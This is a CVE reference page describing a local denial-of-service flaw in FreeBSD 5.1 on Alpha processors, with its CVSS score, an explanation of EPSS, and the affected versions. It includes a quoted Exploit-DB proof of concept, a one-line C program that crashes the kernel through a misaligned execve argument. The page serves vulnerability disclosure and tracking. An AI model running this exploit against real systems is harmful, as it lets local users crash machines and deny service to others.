Notifications for a CVE
Stay informed of any changes for a specific CVE.
CVE Descriptions
FreeBSD 5.1 for the Alpha processor allows local users to cause a denial of service (crash) via an execve system call with an unaligned memory address as an argument.
CVE Informations
Metrics
| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 2.1 | AV:L/AC:L/Au:N/C:N/I:N/A:P | nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 24233
Publication date : 2004-06-22 22h00 +00:00
Author : Marceta Milos
EDB Verified : Yes
/*
source: https://www.securityfocus.com/bid/10596/info
It is reported that FreeBSD running on the Alpha architecture is susceptible to a denial of service vulnerability in its execve() system call.
An attacker with local interactive user-level access on an affected machine is reportedly able to crash FreeBSD when running on the Alpha architecture, denying service to legitimate users.
FreeBSD 5.1-RELEASE/Alpha is reported vulnerable, other architectures with strict memory alignment requirements are also likely vulnerable. IA32 is reported immune. Versions other than 5.1-RELEASE are likely affected as well.
*/
/*
* FreeBSD/Alpha local DoS
* by Marceta Milos
* root@marcetam.net
*
*/
char main() { execve("/bin/ls",(int *)(main + 1), 0); }
Products Mentioned
Configuraton 0
Freebsd>>Freebsd >> Version 4.10
Freebsd>>Freebsd >> Version 5.1
- Freebsd>>Freebsd >> Version 5.1 (Open CPE detail)
- Freebsd>>Freebsd >> Version 5.1 (Open CPE detail)
- Freebsd>>Freebsd >> Version 5.1 (Open CPE detail)
- Freebsd>>Freebsd >> Version 5.1 (Open CPE detail)
- Freebsd>>Freebsd >> Version 5.1 (Open CPE detail)
- Freebsd>>Freebsd >> Version 5.1 (Open CPE detail)
- Freebsd>>Freebsd >> Version 5.1 (Open CPE detail)
- Freebsd>>Freebsd >> Version 5.1 (Open CPE detail)
- Freebsd>>Freebsd >> Version 5.1 (Open CPE detail)
- Freebsd>>Freebsd >> Version 5.1 (Open CPE detail)
- Freebsd>>Freebsd >> Version 5.1 (Open CPE detail)
- Freebsd>>Freebsd >> Version 5.1 (Open CPE detail)
- Freebsd>>Freebsd >> Version 5.1 (Open CPE detail)
- Freebsd>>Freebsd >> Version 5.1 (Open CPE detail)
- Freebsd>>Freebsd >> Version 5.1 (Open CPE detail)
- Freebsd>>Freebsd >> Version 5.1 (Open CPE detail)
Freebsd>>Freebsd >> Version 5.1
Freebsd>>Freebsd >> Version 5.1
Freebsd>>Freebsd >> Version 5.1
Freebsd>>Freebsd >> Version 5.1
Freebsd>>Freebsd >> Version 5.2.1
References
The information presented on CVE Find originates from several carefully selected reference sources. CVE data is provided by MITRE Corporation and the National Vulnerability Database (NVD). The Known Exploited Vulnerabilities (KEV) catalog is sourced from the Cybersecurity and Infrastructure Security Agency (CISA), while EPSS scores come from FIRST.org. Additionally, data regarding software weaknesses (CWE) and common attack patterns (CAPEC) is maintained by MITRE Corporation, and information on hardware and software configurations (CPE) is provided by the NVD.